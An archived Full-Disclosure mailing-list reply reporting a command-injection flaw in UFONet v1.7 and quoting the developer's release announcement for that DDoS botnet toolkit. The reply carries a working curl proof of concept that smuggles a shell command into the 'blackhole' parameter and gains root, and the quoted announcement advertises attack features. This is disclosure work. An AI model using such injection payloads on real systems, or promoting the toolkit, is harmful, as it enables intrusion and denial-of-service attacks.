lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 16 Jul 2021 12:06:23 +0100
From: Pierre Kim <pierre.kim.sec@...il.com>
To: psy <epsylon@...eup.net>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD]
	New Release: UFONet v1.7 - "KRäK!eN"...

Hi,

Attention to all motherships, borgs have been detected inside a
blackhole. Brace yourself for the impact:

    $ curl "http://localhost:9999/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'"
    $ cat /tmp/plop
    uid=0(root) gid=0(root) groups=0(root)

Energy shield levels critical! Enemies detected on the deck. Immediate
response needed!

Can you request a CVE ?

Best regards,

- Captain Alex Torres and Pilot Pierre Kim

On 7/15/21, psy <epsylon@...eup.net> wrote:
> Hi Community,
>
> I am glad to present a new release of this tool:
>
>   - https://ufonet.03c8.net
>
> ---------
>
> "UFONet is a free software, P2P and cryptographic -disruptive toolkit-
> that allows to perform DoS and DDoS attacks; on the Layer 7 (APP/HTTP)
> through the exploitation of Open Redirect vectors on third-party
> websites to act as a botnet and on the Layer3 (Network) abusing the
> protocol."
>
> "It also works as an encrypted DarkNET to publish and receive content by
> creating a global client/server network."
>
> ---------
>
> Main options are:
>
>   * DDoS (botnet) + DoS
>   * Auto-update
>   * Clean code
>   * Documentation with examples
>   * Web/GUI Interface
>   * Proxy to connect to 'zombies' (ex: tor)
>   * Change HTTP Headers (User-Agent, Referer, Host...)
>   * Configure requests (Timeout, Retries, Delay, Threads...)
>   * Search for 'zombies' on different search engines
>   * Test vulnerabilities on 'zombies'
>   * Download/Upload 'zombies' from/to others
>   * Inspect a target (HTML objects sizes)
>   * Set a place to 'bite' on a target (ex: big file)
>   * Control number of rounds to attack
>   * Apply cache evasion techniques
>   * Advanced queries (ex: Verb tunneling exploitation)
>   * Supports GET/POST
>   * Multithreading
>   * Order 'zombies' to attack you for benchmarking
>   * Geomapping / Visual data
>   * [...]
>
> This release (v1.7) called "/KRäK!eN/" has added this new features:
>
>   * Bugfixing
>   * Added: "Deploy"
>   * Added: "SHIP.TV"
>   * Added: "Nodes"
>   * Modified/Updated: Web/GUI
>   * Updated Documentation
>   * Updated FAQ (offline/online)
>   * Updated Website
>   * [...]
>
> ---------
>
> FAQ:
>
>   - https://ufonet.03c8.net/FAQ.html
>
> ---------
>
> Packages:
>
>   * [source]:
>
>   - https://code.03c8.net/epsylon/ufonet
>
>   * [mirror]:
>
>   - https://github.com/epsylon/ufonet
>
>   * [.zip]:
>
>   - https://ufonet.03c8.net/ufonet/ufonet-v1.7.zip
>
>   * [.tar.gz]:
>
>   - https://ufonet.03c8.net/ufonet/ufonet-v1.7.tar.gz
>
> -------------------------
>
> MEDIA:
>
>   * [Video] [07.2021] UFONet - "/KRäK!eN/":
>
>   - https://ufonet.03c8.net/ufonet/ufonet-kraken.ogv
>


-- 
Pierre Kim
pierre.kim.sec@...il.com
@PierreKimSec
https://pierrekim.github.io/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists